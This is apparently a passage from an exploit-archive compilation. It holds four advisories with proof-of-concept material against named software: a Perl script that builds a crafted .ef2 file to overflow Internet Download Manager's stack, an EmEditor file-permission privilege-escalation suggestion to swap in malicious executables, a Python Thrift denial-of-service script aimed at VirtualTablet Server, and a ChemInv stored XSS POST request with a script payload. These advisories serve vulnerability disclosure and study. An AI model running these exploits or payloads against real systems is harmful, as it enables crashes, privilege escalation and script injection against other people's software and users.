Exploitation requires a low-privilege or restricted local user account. The
import vector (1.2) additionally needs the target user to import the crafted
*.ef2 file, so that case does require user interaction; the search vector (1.1)
needs only local access to the running application.
Successful exploitation overwrites the active registers and the SEH chain; any
code execution obtained from that runs in the context of the user running IDM,
not at a higher privilege level, unless a separate boundary is crossed.
Vulnerable Module(s):
[+] Search
[+] Import/Export (ef2)
Proof of Concept (PoC):
=======================
1.1
The stack buffer overflow vulnerability can be exploited by a local
attacker with an ordinary user account who can interact with the running IDM window;
no action by another user is needed.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the software
2. Click the downloads menu and open the search
3. Inject a large unicode payload inside the search input field and transmit
4. The software crashes with several uncaught exceptions because the SEH
record at 0168D8F0 has been overwritten (see the debug log below)
5. Successful reproduce of the local buffer overflow vulnerability!
--- Debug Logs (0168D8F0) ---
00d61850 668b08 mov cx,word ptr [eax] ds:002b:41414141
-
00D6186D |. 56 PUSH ESI ; /Arg1
-
00D61882 |. E8 59FFFFFF CALL IDMan.00D617E0 ;
IDMan.00D617E0
-
00D6189B |> 50 PUSH EAX ; /Arg1
-
00D6189E |. E8 3DFFFFFF CALL IDMan.00D617E0 ;
IDMan.00D617E0
-
Call stack
Address=0168C79C
Stack=00DFE0F2
Procedure / arguments=IDMan.00D617E0
Called from=IDMan.00DFE0ED
Frame=0168E02C
-
SEH chain
Address SE handler
0168C790 IDMan.00F751E8
0168D8F0 41414141
-
EAX 41414141
ECX 01680000
EDX 41414141
EBX 00000001
ESP 0168C76C
EBP 0168E02C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
ESI 0168C7AC UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
EDI 00410043
EIP 00D61850 IDMan.00D61850
Executable modules
Base=00D60000
Size=00539000 (5476352.)
Entry=00F5CB1C IDMan.<ModuleEntryPoint>
Name=IDMan
File version=6, 37, 11, 2
Path=C:\Program Files (x86)\Internet Download Manager\IDMan.exe
1.2
The stack buffer overflow vulnerability can be exploited by a local
attacker with an ordinary user account, but it requires the target user to import
the crafted *.ef2 file (step 4 below), so this vector relies on user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the software
2. Start the bof_poc.pl
3. Open the tasks menu
4. Click import and import *.ef2 poc
Note: The software process crashes on import with an uncaught exception
5. Successful reproduce of the local buffer overflow vulnerability!
Usage Example: Export/Import (*.ef2)
<
https://www.vulnerability-lab.com/download_content.php?id=1337
referer: https://www.vulnerability-lab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
>
PoC: Exploit
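#!/usr/bin/perl
# Local Stack Buffer Overflow Exploit for Internet Download Manager v6.37.11.1
# Vulnerability Laboratory - Benjamin Kunz Mejri
#
# Generates bof_poc.ef2, an IDM task export file whose URL, Referer and
# User-Agent fields are each padded with 1024 'A's. Importing it via
# Tasks -> Import triggers the crash described in section 1.2 above.
use strict;
use warnings;

my $poc = "bof_poc.ef2";
my $pad = "A" x 1024;   # the field length, not its content, is what matters

# One record in the "< ... >" layout shown in the Usage Example above.
# The published listing had its "\n" escapes stripped (printed as " n "),
# which would have put every field on a single line; restored here.
my @fields = (
    "<",
    "https://$pad",
    "Referer:$pad",
    "User Agent:$pad",
    ">",
);

print "[+] Producing bof_poc.ef2 ...";
# Truncate ('>') instead of append ('>>'): re-running the original stacked a
# second record onto the same file, producing a malformed ef2.
open my $fh, '>', $poc or die "Cannot open $poc: $!";
print {$fh} join("\n", @fields), "\n";
# Buffered write errors surface at close, so check that too.
close $fh or die "Cannot close $poc: $!";
print "\n[+] done !\n";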
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Exploit Title: EmEditor 19.8 - Insecure File Permissions
# Date: 2020-04-27
# Exploit Author: SajjadBnd
# Vendor Homepage: https://www.emeditor.com/
# Software Link: https://support.emeditor.com/en/downloads/suggested
# Version: 19.8
# Tested on: Win10 Professional x64
[ Description ]
EmEditor is a fast, lightweight, yet extensible, easy-to-use text editor for Windows.
Both native 64-bit and 32-bit builds are available, and moreover,
the 64-bit includes separate builds for SSE2 (128-bit), AVX-2 (256-bit),
and AVX-512 (512-bit) instruction sets.
[ PoC ]
C:\Users\user\AppData\Local\Programs\EmEditor
λ icacls *.exe
ee128.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
ee256.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
ee512.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
EEAdmin.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
eehlpver.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
eeupdate.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
emedhtml.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
EmEditor.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
emedtray.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
emedws.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
DESKTOP-K4UDI4I\user:(F)
Successfully processed 10 files; Failed processing 0 files
[ Exploit - Privilege Escalation ]
Replace any of the *.exe files with a malicious executable of your choice, then wait for it
to be run by a more privileged principal to obtain SYSTEM or Administrator rights (Privilege Escalation).
- DLL hijacking (emonig.dll, emregexp.dll, emtoast.dll, ...) is also an option if those DLLs carry
  the same ACL (their permissions are not shown in the listing above) ;D
Caveat: the listing above is a per-user install under C:\Users\user\AppData\Local\Programs\EmEditor,
and the ACL grants (F) only to SYSTEM, Administrators and the installing user -- not to Users or
Everyone. Overwriting binaries in one's own profile crosses a privilege boundary only if an
administrator or SYSTEM process later executes them from that path (for example an elevated run of
EEAdmin.exe or an update through eeupdate.exe -- neither is demonstrated here). Without such a trigger
this is self-modification by the same user, not privilege escalation.
# Title: VirtualTablet Server 3.0.2 - Denial of Service (PoC)
# Author: Dolev Farhi
# Date: 2020-04-29
# Vulnerable version: 3.0.2 (14)
# Link: http://www.sunnysidesoft.com/
# CVE: N/A
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from pygen.example import Example
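# Target VirtualTablet Server instance (Thrift binary protocol over TCP).
host = '192.168.1.1'
port = 57110

try:
    transport = TSocket.TSocket(host, port)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = Example.Client(protocol)
    transport.open()
    try:
        # Oversized string argument to the `say` call; per the advisory this
        # crashes the server (denial of service). Only the request is sent,
        # no reply is awaited.
        client.send_say('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
    finally:
        # The original left the transport open when send_say raised; always
        # close it once open() has succeeded.
        transport.close()
except Thrift.TException as tx:
    print(tx.message)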
# Exploit Title: ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting
# Exploit Author: Bobby Cooke
# Date: 2020-04-29
# Software Link: https://github.com/tmorrell/cheminv
# Software Info:
# "Cheminv is a web-based chemical inventory system. This responsive database provides an accessible way to organize and order chemicals, and is provided as an open-source package for all non-commercial users."
# "Cheminv was created by Thomas Morrell for the Haw Yang Lab at Princeton University"
# "Cheminv is based on ecDB www.ecDB.net, which was created by Nils Fredriksson aka. ElectricMan and designed by Buildlog."
# Version: 1
# Tested On: CentOS
# Vulnerability Type:
# ChemInv suffers from a persistent cross-site scripting vulnerability (XSS). It can be exploited to make every user of the system who has read access to the project execute malicious client-side code each time they view the 'Projects' or 'Add Chemicals' tab.
# The application's source code mitigates SQL injection (SQLi) with mysql_real_escape_string(), but that only escapes for the SQL layer; it does not HTML-encode the value. The stored project name is later rendered on those tabs without output encoding (that rendering code is the actual XSS sink and is not shown in the excerpt below).
# Vulnerable Source Code
## proj_list.php
33 include('include/include_proj_add.php');
34 $AddProj = new ProjAdd;
35 $AddProj->AddProj();
36
37 $proj_query = mysql_query("SELECT * FROM projects WHERE project_owner= $owner");
## include/include_proj_add.php
2 class ProjAdd {
3 public function AddProj () {
4
5 require_once('include/login/auth.php');
6 include('include/mysql_connect.php');
7
8 if(isset($_POST['submit'])) {
9 $owner = $_SESSION['SESS_MEMBER_ID'];
10 $name = mysql_real_escape_string($_POST['name']);
11
12 if ($name == '') {
13 echo '<div class="message red">';
14 echo 'You have to specify a name!';
15 echo '</div>';
16 }
17 else {
18 $sql="INSERT into projects (project_owner, project_name) VALUES ('$owner', '$name')";
19 $sql_exec = mysql_query($sql);
# Malicious POST Request to https://TARGET/proj_list.php
POST /proj_list.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/proj_list.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Connection: close
Cookie: PHPSESSID=7af5kg3to8fstfum0to1ukpb85
name=evilProject<script>alert('XSS');</script>&submit=